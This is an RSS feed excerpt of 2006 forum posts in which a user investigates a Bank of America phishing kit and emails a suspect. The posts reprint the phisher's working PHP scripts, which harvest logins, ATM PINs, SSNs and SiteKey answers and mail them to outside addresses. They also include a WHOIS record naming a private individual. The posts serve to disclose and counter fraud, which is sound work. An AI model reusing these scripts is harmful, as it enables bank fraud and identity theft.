BOA scam:<br>Some of the logs were sent to me by mistake??</I><br><br><div class="code"><PRE><span class="codetext">if(isset($atm_number) || isset($pin)) <br>{ if(!ereg("^&#91;0-9&#93;+$",$atm_number) || !ereg("^&#91;0-9&#93;+$",$pin))<br>    { header("Location: GotoErrorVerifyPage.htm"); return FALSE;}  }  <br> <br>session_start();<br> <br>//USER ACCOUNT<br> <br>$D1 = $_POST&#91;'D1'&#93;;<br>$online_id = $_POST&#91;'online_id'&#93;;<br>$passcode = $_POST&#91;'passcode'&#93;;<br>$repasscode = $_POST&#91;'repasscode'&#93;;<br>$email = $_POST&#91;'email'&#93;;<br>$atm_number = $_POST&#91;'atm_number'&#93;;<br>$pin = $_POST&#91;'pin'&#93;; <br> <br>//SECURITY QUESTION<br> <br>$ssn1 = $_POST&#91;'ssn1'&#93;;$ssn2 = $_POST&#91;'ssn2'&#93;;$ssn3 = $_POST&#91;'ssn3'&#93;;<br>$ip = $_SERVER&#91;"REMOTE_ADDR"&#93;;<br> <br>$subj = "Full Info  BoA ip :$ip";<br>$msg = "Full Info From ip :$ip <br>      \nUSER ACCOUNT<br>      \n-------------------<br>    \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email<br>    \n\nSECURITY QUESTION <br>      \n---------------------<br>    \n\nS S N : $ssn1-$ssn2-$ssn3";<br> <br>$from = "From: BoA&lt;support@PlatinumBank.com&gt;";<br>$to = " purisangeh_team@yahoo.com";</SPAN></PRE></DIV><br>I thought that it may break the ice!! or loose him. However, he responded:<br><br><HR><I>From: ariando huge <br>To: Macs Retsub <br>Date: Feb 2, 2006 1:28 PM<br>Subject: Re: Kaskus<br><br>By the way who are you and what is your business. I just signed up this email for 2 weeks ago. Maybe you made a mistake of contact to person that you mentioned. Please let me know what can I do for you??<br> <br>Regard,<br> <br>Huge</I><HR><br><br>Well! that's a big lie, as I posted above I checked the address at the time of posting the dig and it was valid and I also  checked it several times afterwards. Yahoo could not have recylcled it in a 48 hour period. Besides, is there a waiting list for Purasengh_Team at Yahoo. In addition the script files that contained the addy were dated ~12/25. So I responded:<br><br><HR><I>From: Macs Retsub <br>To: ariando huge <br>Date: Feb 2, 2006 2:05 PM<br>Subject: Re: Kaskus<br> <br>You need to check again, this account was active on or before January 1,  2006, who is in the "Team" ??</I><HR><br><br>Within twenty minutes I get this back:<br><br><HR><I>From: ariando huge   <br>To: Macs Retsub <br>Date: Feb 2, 2006 2:24 PM<br>Subject: Re: Kaskus<br><br>How you can chek it? and who are you? why you investigate me like police? i am musician in New Zealand. Purisangeh is my Group Band Name. What you want ask from me again??</I><HR><br><br>Now I am thinking, is this guy an intern for the Purisangeh Team or what?, I had my red push pin stuck in Jakarta on my world map. Now he says that he is in New Zealand. Well he lied about the two week old email address, so I checked on his honesty by having a look at the mail headers.<br><SMALL><br>X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a<br>Delivered-To: *******@gmail.com<br>Received: by 10.48.248.4 with SMTP id v4cs6897nfh;<br>        Thu, 2 Feb 2006 01:06:55 -0800 (PST)<br>Received: by 10.54.128.14 with SMTP id a14mr2115170wrd;<br>        Thu, 02 Feb 2006 01:06:55 -0800 (PST)<br>Return-Path: <br>Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99])<br>        by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54;<br>        Thu, 02 Feb 2006 01:06:55 -0800 (PST)<br>Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)<br>DomainKey-Status: good (test mode)<br>Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000<br>DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;<br>  s=s1024; d=yahoo.com;<br>h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;<br>  Message-ID: <br>Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST<br>Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)<br>From: ariando huge <br>Subject: Re: Kaskus<br>To: Macs Retsub <br></SMALL><br><br>I then did a lookup of IP 222.124.19.29<br><br><SMALL>Location: Indonesia (high) [City: Jakarta, Jakarta Raya (Djakarta Raya)]<br>inetnum:      222.124.19.16 - 222.124.19.31<br>netname:      TLKM_D3_AST_DUYA_MEDIA<br>country:      ID<br>descr:        PT. DUYA MEDIA<br>descr:        Public Internet Cafe<br>descr:        Jl. Buah Batu No. 165D<br>descr:        Bandung<br>admin-c:      KI32-AP<br>tech-c:       KI32-AP<br>remarks:      ------------------------------------------------------------------<br>remarks:      Send ABUSE and SPAM reports with plain ASCII text only to<br>remarks:      **********@yahoo.com cc to *****@telkom.net.id<br>remarks:      The netname enclosed in square bracket is included in the subject.<br>remarks:      ------------------------------------------------------------------<br>status:       ASSIGNED NON-PORTABLE<br>changed:      ****@telkom.co.id 20050725<br>mnt-by:       MAINT-TELKOMNET<br>source:       APNIC<br><br>person:       KHAIRIL IMAMI<br>nic-hdl:      KI32-AP<br>e-mail:       **********@yahoo.com<br>address:      Jl. Buah Batu No. 165D<br>address:      BANDUNG<br>phone:        +62227319398<br>country:      ID<br>changed:      ****@telkom.co.id 20050718<br>mnt-by:       MAINT-TELKOMNET<br>source:       APNIC<br></SMALL><br><br>Ha ha, "huge ariando" you are right where I thought you were, and in an internet cafe no less in downtown Bandung, which is the capital city of West Java Province, about 100 miles southeast of Jakarta. Not exactly New Zealand, so I wrote:<br><br><HR><I>From: Macs Retsub <br>To: ariando huge <br>Date: Feb 2, 2006 2:53 PM<br>Subject: Re: Kaskus<br>  <br>Then why are you now at an Internet Cafe in Bandung?? are you on holidays?<br>What kind of music do you play? what does Purisangeh mean?</I><HR><br><br>I didn't want to blow him away, I wanted to keep him going, so I included an out!<br>Then I got this:<br><br><HR><I>From: ariando huge  <br>To: Macs Retsub <br>Date: Feb 2, 2006 3:39 PM<br>Subject: Re: Kaskus<br><br>I still do not understand with you. I am Jazz Musician. We are in concernt here since 28 january. Listen to me, now i really feel annoyed because of you. I dont know you and you not tell me who you are? So stop email me anonymous person.<br> <br>BYE.</I><HR><br><br>Ouch!!, yes I am sort of anonymous, my email is not traceable. I don't want to loose him just yet, so I take a five minute refresher course in geography. There are several universities in Bandung, I suspect he may be a student. I try to get him back by alluding to be right there, amd throw some local names in.<br><br><HR><I>From: Macs Retsub  <br>To: ariando huge <br>Date: Feb 2, 2006 4:26 PM<br>Subject: Re: Kaskus<br><br>Please, do not be annoyed, I like Jazz music too, more progressive though, I am a big fan of DISCUS. Where are you playing at ? the Savoy? maybe I can attend a concert, I checked the papers and I don't see any adverts. Maybe you can come back from New Zealand and play at one of the festivals at Bale Ayer in Taman Ria Senayan in Jakarta, have you ever been there? Try and visit Saung Mang Udjo while you are here. How many are in your band? What instrument do you play?</I><HR><br><br>Wow!! it took all of 4 minutes to get a reply. Boy he sure spends a lot of time on the web in a internet cafe for a on tour "in concert jazz musician"<br><br><HR><I>From: ariando huge  <br>To: Macs Retsub <br>Date: Feb 2, 2006 4:30 PM<br>Subject: Re: Kaskus<br><br>are you indonesian?? " Apa Kabar? " Why you know all about indonesian place? can you chate with me on yahoo messager? My ID is homebeautypink. I am online now.<br> <br>Regard,<br> <br>Huge</I><HR><br><br>Well that sure brought him right back, and he is a homeboy, look at that, form a New Zealander to " Apa kabar" all in a few messages. Well I looked it up: <br><I> The phrase "apa kabar" literally means "what (your) news". ... To answer "apa kabar", we usually use "baik" or "baik-baik" to indicate that it's good</I><br><br>I never replied to the "invitation" as I would have to use a nearby proxy, plus I am now stuck language wise. I decided to preserve my options, and sleep on it.<br>I really just want to get an answer to " What the F**k did you do with all the credit card data that came streaming into that account, and what other scams are now ongoing.<br><br>MGD <br><br><SMALL>Edit=typo+formatting</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15391819</guid>
<pubDate>Fri, 03 Feb 2006 04:21:47 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15187101</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : <div class="bquote"><SMALL>said by  removed <A HREF="/useremail/u/581232"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR>To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing,.....<br> </DIV>Ahh, that explains why I have ran across it multiple times. Can we then assume it a total hack job because the file is dated the same as the phish folders?. He must also have control over the domain dns, in order to have created the sub domain prefix.<br><br>MGD]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15187101</guid>
<pubDate>Fri, 06 Jan 2006 17:54:35 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15186645</link>
<description><![CDATA[<A HREF="/useremail/u/1241346"><b>huntermcdole</b></A> : Good to know that they are going down.  I have a catch all account at my domain so I get a lot of spam and some of them are phishing attemps.  That was the first one I have seen where the link almost lookd like the real site, most I see are 124.15.154.21 type]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15186645</guid>
<pubDate>Fri, 06 Jan 2006 16:55:17 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15186581</link>
<description><![CDATA[<A HREF="/useremail/u/581232"><b>removed</b></A> : To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing, and probably not something that the scammer set up to fool authorities.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15186581</guid>
<pubDate>Fri, 06 Jan 2006 16:46:12 EDT</pubDate>
</item>

<item>
<title>[Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15186455</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : I was checking out a BOA phish posted by  huntermcdole <A HREF="/useremail/u/1241346"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> on phishtrack: &raquo;<A HREF="/phishtrack?pid=590&parts=1">/phishtrack?pi&middot;&middot;&middot;&parts=1</A> I am looking to see if any wizards out there can review that following data, and dig up any additional info or fingerprints on these criminals.<br><br>This is a very professional and slick phish &raquo;<A HREF="http://www.bankofamerica.com.cgi-bin.bofa.ias.cfusa.net/MbrezU2xs8o0u_LYXs2iLSUyHCYJF6hVvHqksi1580602/1/bofa/ibd/IAS/presentation/sso.login.controller.htm" >www.bankofamerica.com.cgi-bin.bo&middot;&middot;&middot;ller.htm</A> because in addition to the victims account data, it also seems to create or obtain your sitekey data. You can enter bogus info on the first page and then see what the sitekey page is trying to do.<br><br>Fortunately while monitoring the phish site I came across the entire upload package from the phisher. They went back and removed the zipped payload within a few hours [Exhibit 1 & 2]. There may be additional unique data that can be found, see attached presentation.zip. Though you obviously cannot see the php scripts on other BOA phishes, I wonder if there are other unique items that could be used to link them to the same author.<br><br>Someone more familiar with php scripts can confirm if there are two separate emails going to the phisher. One from "securekey.php" with sitekey/securekey info going to: <B>purisangeh_team@yahoo.com</B> and a back up to <B>rdcpt0809@airpost.com</B> with a from of BoA(support[AT]PlatinumBank.com)<br><div class="code"><PRE><span class="codetext">&lt;?<br> <br>//if($securityKey3Ansr==""||$securityKey2Ans==""||$securityKey1Ans=="")<br>  //  {header("Location: GotoErrorsecurityKeyPage.htm");return FALSE; }<br> <br>session_start();<br> <br>//USER ACCOUNT<br> <br>$securityKey1 = $_POST&#91;'securityKey1'&#93;;<br>$securityKey1Ans = $_POST&#91;'securityKey1Ans'&#93;;<br>$securityKey2 = $_POST&#91;'securityKey2'&#93;;<br>$securityKey2Ans = $_POST&#91;'securityKey2Ans'&#93;;<br>$securityKey3 = $_POST&#91;'securityKey3'&#93;;<br>$securityKey3Ansr = $_POST&#91;'securityKey3Ans'&#93;;<br>$ip = $_SERVER&#91;"REMOTE_ADDR"&#93;;<br> <br>$subj = "Site Key BoA ip :$ip";<br>$msg = "Site key From ip :$ip<br>      \n-------------------<br>    \n\nSiteKey Challenge Question1: $securityKey1\nAnswer1: $securityKey1Ans\nSiteKey Challenge Question2: $securityKey2\nAnswer2: $securityKey2Ans\nSiteKey Challenge Question3: $securityKey3\nAnswer3: $securityKey3Ans<br>    ";<br> <br>$from = "From: BoA&lt;support@PlatinumBank.com&gt;";<br>$to = "purisangeh_team@yahoo.com";<br>$backup = "rdcpt0809@airpost.com";<br> <br>mail($to, $subj, $msg, $from, $chk);<br>mail($backup, $subj, $msg, $from, $chk);<br>header("Location: GotoCompletePage.htm");<br> <br>?&gt;</SPAN></PRE></DIV><br>Another file "update.php" appears to be mailing the online id passcode and atm info to the same addresses:<br><br><div class="code"><PRE><span class="codetext">&lt;?<br> <br>if($D1==""||$online_id==""||$passcode==""||$email=="")<br> { if(! ereg ("^.+@.+\\..+$", $email))<br>    {header("Location: GotoErrorAccountPage.htm");return FALSE; }}<br> <br>if($ssn3=="")<br> { header("Location: GotoErrorSecurityPage.htm");return FALSE; }<br> <br>if(isset($atm_number) || isset($pin))<br>{ if(!ereg("^&#91;0-9&#93;+$",$atm_number) || !ereg("^&#91;0-9&#93;+$",$pin))<br>    { header("Location: GotoErrorVerifyPage.htm"); return FALSE;}  }  <br> <br>session_start();<br> <br>//USER ACCOUNT<br> <br>$D1 = $_POST&#91;'D1'&#93;;<br>$online_id = $_POST&#91;'online_id'&#93;;<br>$passcode = $_POST&#91;'passcode'&#93;;<br>$repasscode = $_POST&#91;'repasscode'&#93;;<br>$email = $_POST&#91;'email'&#93;;<br>$atm_number = $_POST&#91;'atm_number'&#93;;<br>$pin = $_POST&#91;'pin'&#93;;<br> <br>//SECURITY QUESTION<br> <br>$ssn1 = $_POST&#91;'ssn1'&#93;;$ssn2 = $_POST&#91;'ssn2'&#93;;$ssn3 = $_POST&#91;'ssn3'&#93;;<br>$ip = $_SERVER&#91;"REMOTE_ADDR"&#93;;<br> <br>$subj = "Full Info  BoA ip :$ip";<br>$msg = "Full Info From ip :$ip<br>      \nUSER ACCOUNT<br>      \n-------------------<br>    \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email<br>    \n\nSECURITY QUESTION<br>      \n---------------------<br>    \n\nS S N : $ssn1-$ssn2-$ssn3";<br> <br>$from = "From: BoA&lt;support@PlatinumBank.com&gt;";<br>$to = "purisangeh_team@yahoo.com";<br>                                                                                                                                                                                                                                              $backup = "rdcpt0809@airpost.net";<br> <br>mail($to, $subj, $msg, $from, $chk);<br>                                                                                                                                                                                                                                              mail($backup, $subj, $msg, $from, $chk);<br>header("Location: GotoCompletePage.htm");<br> <br>?&gt;</SPAN></PRE></DIV><br>Unfortunately without figuring out the password to the Yahoo email account there is no way to locate victims. I have never been able to have Yahoo pull an account based on submitting a  script snippet showing that it is being used as a data collection tool. I guess it is possible to interfere and load them with bogus data by looking at the way the script formats the mail.<br><br>While the yahoo address is currently valid, it is difficult to check the backup one. Airpost.net appears to be a Canadian company that maybe forwards email, though it appears that there is no current DNS records so I am not sure if it is active.<br><br>The use of purisangeh_team indicates a group operation. Purisangeh may be Indonesian as indicated by a google search: &raquo;<A HREF="http://www.google.com/search?hl=en&q=Purisangeh&btnG=Google+Search" >www.google.com/search?hl=en&q=Pu&middot;&middot;&middot;e+Search</A> I went to the Kaskus site listed at the top of the search looking for posts by the user Purisangeh, however the forum search function is disabled. It was worth checking because the search shows that it is not a common word. (WARNING: while looking at the google cache of KASKUS yesterday I got a popup with an attempt to install the wmf exploit, it only happened once, I have been back several times without incident, but be careful if you go there.)<br><br>Due to Google showing that "purisangeh" was rather unique, I decided to check out the purisangeh.org that was included in the search return. It is not an active domain, the A record points to Yahoo but looks like it may be pulled. Checking on the registration shows that it was registered in October of 2004 for 5 years to an individual in Cummings, GA. using an email address of purisangeh8181@yahoo.com. Someone in Georgia registering a name like that for 5 years did not seem cool, so I called the registered telephone number which turned out to be not them. I located a correct number for that name and spoke to the individual. As suspected they did not register the Purisangeh.org domain. However in October of 04 at the same time as the registration their credit card had been hit for hundreds of dollars in fraudulent charges. Their Bank notified them that the multiple charges were for all kinds of "Internet services". I am convinced that these are the same criminals.<br><br>I am not sure what is going on where the phish is hosted at cfusa.net. Doesn't the phisher need control of the domain in order to do this?: &raquo;<A HREF="http://www.bankofamerica.com.cgi-bin.bofa.ias.cfusa.net" >www.bankofamerica.com.cgi-bin.bo&middot;&middot;&middot;fusa.net</A> which resolves the same as &raquo;<A HREF="http://www.cfusa.net" >www.cfusa.net</A>. Notice how the phisher has his own "suspended page" available at &raquo;<A HREF="http://www.bankofamerica.com.cgi-bin.bofa.ias.cfusa.net/suspended.page/" >www.bankofamerica.com.cgi-bin.bo&middot;&middot;&middot;ed.page/</A> I have seen that exact page format on other phishes. I guess you can fake the account as being closed when the heat is on, slick!!.<br><br>As recent as December 21st the google cache of the site showed this:&raquo;<A HREF="http://64.233.187.104/search?q=cache:vIYTRR8oIFwJ:cfusa.net/+&hl=en" >64.233.187.104/search?q=cache:vI&middot;&middot;&middot;/+&hl=en</A> Seems a little strange !!. The domain has been around for a few  years see archive: &raquo;<A HREF="http://web.archive.org/web/*/http://www.cfusa.net" >web.archive.org/web/*/http://www.cfusa.net</A><br><br>MGD<br><br>P.S. Since preparing this post the phish page now appears to be down, it was down and modified a few times during the research but came back. The directories are all still there.<div class="borderless"><TABLE WIDTH=95% align=center border=0 CELLPADDING=4"><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#FFFFFF nwrap COLSPAN=3 WIDTH=100%><A HREF="/speak/slideshow/15186455?c=948873&ret=L2ZvcnVtL3IxNTE4NjY0NS54bWw%3D"><IMG class="apic" BORDER=0 TITLE="24174 bytes" WIDTH=600 HEIGHT=435 SRC="/r0/download/948873.thumb600~2ac81001c6c2a025b76be60cfdb8ede8/BOA_PhishZipEX1.png/thumb.jpg" ALT="Click for full size"></A><br>Before</TD></TR><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#FFFFFF nwrap COLSPAN=3 WIDTH=100%><A HREF="/speak/slideshow/15186455?c=948874&ret=L2ZvcnVtL3IxNTE4NjY0NS54bWw%3D"><IMG class="apic" BORDER=0 TITLE="22798 bytes" WIDTH=600 HEIGHT=435 SRC="/r0/download/948874.thumb600~67b664a07757b660f72ab9a40c30fa2b/CFUSA_newEX2.png/thumb.jpg" ALT="Click for full size"></A><br>After</TD></TR><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#FFFFFF nwrap COLSPAN=3 WIDTH=100%><A HREF="/speak/slideshow/15186455?c=948875&ret=L2ZvcnVtL3IxNTE4NjY0NS54bWw%3D"><IMG class="apic" BORDER=0 TITLE="18034 bytes" WIDTH=600 HEIGHT=435 SRC="/r0/download/948875.thumb600~aedbd895cc48a635298fc5bcf50469cb/CFUSA_dirEX3.png/thumb.jpg" ALT="Click for full size"></A><br>Cfusa Dir</TD></TABLE></div>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15186455</guid>
<pubDate>Fri, 06 Jan 2006 16:31:21 EDT</pubDate>
</item>

</channel>
</rss>
